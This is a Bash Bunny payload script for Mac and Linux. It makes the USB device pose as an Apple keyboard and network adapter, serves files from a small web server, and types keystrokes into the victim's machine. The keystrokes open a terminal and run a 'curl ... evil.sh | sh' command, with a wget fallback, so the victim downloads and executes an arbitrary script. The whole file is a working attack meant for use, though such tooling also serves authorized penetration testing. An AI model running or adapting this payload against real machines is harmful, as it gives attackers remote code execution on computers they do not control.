#!/bin/bash

# Title:     ShellExec
# Author:    audibleblink
# Target:    Mac/Linux
# Version:   1.0
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
#
# White            |  Ready
# Ammber blinking  |  Waiting for server
# Blue blinking    |  Attacking
# Green            |  Finished

LED R G B
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E

source bunny_helpers.sh

payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log

cd $payload_dir

# starting server
LED R G 500

cat <<EOF | python &>> $log_file &
import SimpleHTTPServer
import BaseHTTPServer
import SocketServer

#Disable logging DNS lookups
BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP')

settings = ('$HOST_IP',80)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(settings, Handler)
httpd.serve_forever();
EOF

# wait until port is listening
while ! nc -z $HOST_IP 80; do sleep 0.2; done

# attack commences
LED B 500

Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000

# Q ALT F2 # swap with block above for linux
# Q DELAY 100

Q STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 
Q ENTER

LED G